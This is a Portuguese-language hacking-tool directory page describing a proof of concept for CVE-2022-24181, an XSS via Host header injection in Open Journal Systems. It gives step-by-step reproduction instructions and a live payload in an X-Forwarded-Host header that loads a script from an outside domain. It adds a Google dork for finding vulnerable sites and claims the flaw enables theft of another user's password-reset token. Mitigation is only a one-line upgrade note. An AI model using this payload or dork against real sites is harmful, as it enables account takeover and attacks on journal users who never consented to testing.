Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-24181 — XSS via injeção de Host Header e roubar o token de redefinição de senha de outro usuário | Kitploit
Ferramentas/GitHubGitHub/cyberhawk000/cve-2022-24181
ReconhecimentoAnálise de VulnerabilidadesExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubcyberhawk000/cve-2022-24181

CVE-2022-24181

XSS via injeção de Host Header e roubar o token de redefinição de senha de outro usuário

Ver Repositório
112há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-24181 e CVE-2022-26616. Ambos são provavelmente iguais.

Open-journal-system-Vulnerability

XSS via injeção de Host Header e roubo do token de redefinição de senha de outro usuário Passos para reproduzir:

  1. Acesse este site: https://who's-using-ojs-software.com
  2. Capture esta solicitação no burp e envie para o repeater.
  3. Adicione isto depois do Host Header: X-Forwarded-Host: foo"><script src=//dtf.pw/2.js><x=".com
  4. Em seguida, clique em send; depois clique com o botão direito na solicitação e clique em show response in browser; depois copie a solicitação.
  5. Cole esta solicitação no navegador e você verá o pop-up de XSS. Mitigação: Atualize para uma versão mais recente.

Google Dork para encontrar esta vulnerabilidade intitle:ojs Esta vulnerabilidade no software Open-journal-system do fornecedor PKP: as versões 2.4.8 a 3.3.8 são todas vulneráveis a XSS via injeção de Host Header e roubo de token de redefinição de senha.

Baixar ferramenta